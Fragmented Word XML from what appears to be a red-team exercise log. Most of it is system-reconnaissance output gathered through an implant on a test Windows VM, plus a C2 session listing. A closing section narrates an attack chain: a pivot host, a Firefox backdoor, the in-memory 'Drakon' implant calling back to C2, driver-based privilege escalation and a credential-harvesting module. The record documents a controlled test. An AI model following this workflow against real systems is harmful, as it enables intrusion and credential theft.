    <w:p w14:paraId="6105427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aylight Savings in Effect = FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D43DF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Enable Daylight Savings = FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6659883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Date/Time Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CC7AC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Network Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268E1BD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 Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CF369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NS Host Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6E01C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Workgroup Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73469DE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Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7724C81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Role = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591CE91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Network Server Mode Enabled = FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4527870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Roles = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1874DA3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Network Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E31C7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Network Profiles --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C7971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Found 0 profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FCE88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Network Profiles --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C70AD2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OS INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B06B31" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="100D1A7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END OS INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BCC44E" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C3E15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3:20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A7B95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cat usersadmintravesty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277F15E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517909B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SYSTEM INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B76FC3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Number of Keyboard(s) = 1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB7779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Number of Mouse(s) = 2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F72D37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Number of HID(s) = 0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632825C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Kernel Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163DDBB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Kernel Type = 1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2303E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Build Version = 10.0.16299.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005A6C0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Kernel Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EEDC4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OS Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1184545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OS Name = Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA3CA8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Version Name = ERROR : WMI Connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529E20E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Build Version = 10.0.16299.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1760C85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OS Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F2483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Memory Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C9FA1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hysical Memory (24.40 GB/28.00 GB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8C2B8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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Virtual Memory (131070.34 GB/131072.00 GB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6EDED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Memory Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E66CCA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All Displays Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C6A6A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Number of Displays = 1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F4D33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isplay #1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365726A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Display Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4872369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imensions = 1024x768 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A651D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BitsPerPixel = 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679DB9E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tsPerInch = 96</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F0EFB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Display Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E29067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All Displays Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E8D10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SYSTEM INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA8BBCF" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2039D71B" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65FDF7A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CPU INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B12C17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Architechture = X64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7995FA5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Endianess = LITTLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B1568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Frequency = 100.00 GHZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7350ABF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Vendor Name = GenuineIntel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E119E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Vendor ID = Intel64 Family 6 Model 6 Stepping 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EABE61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Model Name = QEMU Virtual CPU version 2.5+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A6261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Counts Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280F38D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Number of Hyperthread Cores = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0346D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Number of Cores = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C1D10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Number of Units = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617C6CB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Counts Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D64198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Cache Info --                                                                                                                                                                                                                                                                                                             [41/1015]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0434107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Cache Type = UNIFIED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C69209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Cache Size = 4 MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4815106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Line Size = 64 Bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B22684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Associativity = 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22073C1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Cache Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9A19F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Supported Instruction Sets List --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E24AF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Instruction Set = X87_FPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08625E0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Instruction Set = BMI1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BD7E1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Supported Instruction Sets List --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409B32D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CPU INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFB2174" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693F1875" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="349A3EF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GPU INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6F146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Device List --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6E788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Found 0 GPU devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6511B27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Device List --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F89C0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GPU INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4687A598" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CE89042" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60F31E3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MEMORY INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DB604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hysical Memory (24.40 GB /28.00 GB) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2009490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Virtual Memory (131070.34 GB, 131072.00 GB) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F43651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All Drives Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7789EB2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Number of Logical Drives = 2 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010E780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Drive Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231E938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Letter = C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670F9C9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Volume Name = "UNKNOWN"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF6D7F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Type = FIXED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C8A43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Size =  255.51 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2051426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Available Free =  208.89 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686E250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Total Free =  208.89 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648EE6F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Drive Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59405E4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Drive Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156D0ED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Letter = D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DE905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Volume Name = "Data"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C55263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Type = FIXED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A7CB1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Size =  3583.87 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4526492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Available Free =  3583.59 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D05DC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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Total Free =  3583.59 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAAF05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Drive Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D2166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All Drives Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB2A2D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MEMORY INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621D229C" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C5B016" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="450107A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OS INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5390167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BIOS Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BBC4C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Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1378DA7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escription = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E60D3D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Version = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AC31E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BIOS Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00025CD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MotherBoard Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B1086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Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239C8F9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escription = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483D8DC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Revision Number = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C745FF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MotherBoard Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179320D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Owner Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025F86F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rimary Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C86CD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rimary Contact = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150380A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Owner Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426B07F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Date/Time Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1C85C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Current Time Zone = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2444622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aylight Savings in Effect = FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E775E7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Enable Daylight Savings = FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747000A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Date/Time Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D6DA0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Network Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5876BE5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 Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7014B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NS Host Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD7DB3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Workgroup Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5002B1C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Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126B6B2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Role = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFB5A3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Network Server Mode Enabled = FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBFD02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Roles = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA17DE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Network Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0166D13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Begin Network Profiles --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607518D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Found 0 profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07463B7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Network Profiles --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C62DC0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OS INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679FD60D" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79E3A4E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n Network Profiles --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3B5A7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Found 0 profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590A419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Network Profiles --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7983778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ND OS INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438D53EE" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FD99BDE" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A3D554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3:27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFDAFD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hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2850326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ta52-windows-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AAB56C" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AFEAA7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3:28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DE032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MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2BAEE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W1         128.55.12.77:51258 --&gt;   128.55.12.233:443   [HTTP]  Wed May  8 12:58:02 2019        active 1823s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE2D07B" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1464C75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3:28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79411BF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quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DAC31F" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507C67C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MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA6569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W1         128.55.12.77:51258 --&gt;   128.55.12.233:443   [HTTP]  Wed May  8 12:58:02 2019        DEAD 1843s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B54F77C" w14:textId="1478F501" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_r3do2kfe5o6n" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="16" w:name="_Toc12600000"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>14:37 -- TA5.2 Windows 1 -- Firefox Drakon APT Elevate Copykatz 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="45A729F6" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">First attacked ta51-pivot-2 and deployed OC2, allowing us to run our attack from within the target network.  Exploited Firefox backdoor by again browsing to http://128.55.12.233.  loaderDrakon was executed in Firefox memory and connected out to 128.55.12.233:8000 and 128.55.12.233:443 for C2.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>After the BBN reboot, driver signing was disabled, and we would now be able to use privilege escalation via our perfmon driver.  We loaded the copykatz module planning to recon data from the system; however, an error in our C2 resulted in loss of connection and a premature end to the test.  We re-ran this test later in the same day.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788FB53C" w14:textId="163864C9" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_qtavoj5yvnl" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="18" w:name="_Toc12600001"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="3C28AD64" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta51-pivot-2</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128.55.12.233</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Ubuntu 14.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F90B30F" w14:textId="34A31442" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta52-windows-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009B5E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>128.55.12.76</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Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D324F91" w14:textId="17CCB38B" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_8twidxmi31aj" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="20" w:name="_Toc12600002"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="3E23571A" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Firefox 54.0.1 backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD149CC" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340910A5" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Elevate driver (Perfmon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD05565" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
